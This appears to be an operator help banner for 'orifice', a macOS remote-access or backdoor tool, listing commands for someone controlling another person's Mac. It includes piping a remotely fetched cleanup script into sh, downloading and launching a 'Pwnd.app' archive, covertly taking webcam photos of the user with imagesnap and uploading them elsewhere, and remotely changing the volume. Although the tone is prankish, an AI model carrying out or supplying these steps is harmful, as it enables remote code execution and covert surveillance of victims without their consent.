
-------------------------------------------------
          _   __              _______
   ____ _/ | / /__  _________/ / ___/___  _____
  / __ `/  |/ / _ \/ ___/ __  /\__ \/ _ \/ ___/
 / /_/ / /|  /  __/ /  / /_/ /___/ /  __/ /__
 \__, /_/ |_/\___/_/   \__,_//____/\___/\___/
/____/                              orifice

General:
--------
If you want to get some easier functionality you may want to load the users bash profile. You should at least benefit from their PATH settings

  source ~/.bash_profile


Cleanup Script:
---------------
When you're all done, run the cleanup:

  sh -c "$(curl -fsSL https://raw.githubusercontent.com/gNerdSec/orifice_scripts/master/osx/server/cleanup.sh)"

Script should also in preloaded and executable in .hidden

Photo Stuff:
------------
If you want to have a little fun with their camera... first (assuming you loaded their bash profile) maybe check to see if imagesnap is already installed:

  which imagesnap

If not, you can install it yourself:

  brew install imagesnap

Once installed you can take a picture and put it on their desktop... or upload it somewhere else etc.

  imagesnap ~/Desktop/$(date +%y%m%d%H%M%S).png

App Exec:
---------
Experimental demo using non-malicious app... Retrieve the app and extract it

  wget https://raw.githubusercontent.com/gNerdSec/orifice_scripts/master/osx/server/pwnd.tar.gz
  tar -zxvf pwnd.tar.gz

You can run the app on the desktop via:

  open Pwnd.app

Not sure if default permisisons wil allow it to load... needs more testing.

Volume etc:
-----------
Turn up the volume:

  osascript -e 'set volume 7'

Handy Urls:
-----------
rickroll:

  https://www.youtube.com/watch?v=dQw4w9WgXcQ


-------------------------------------------------

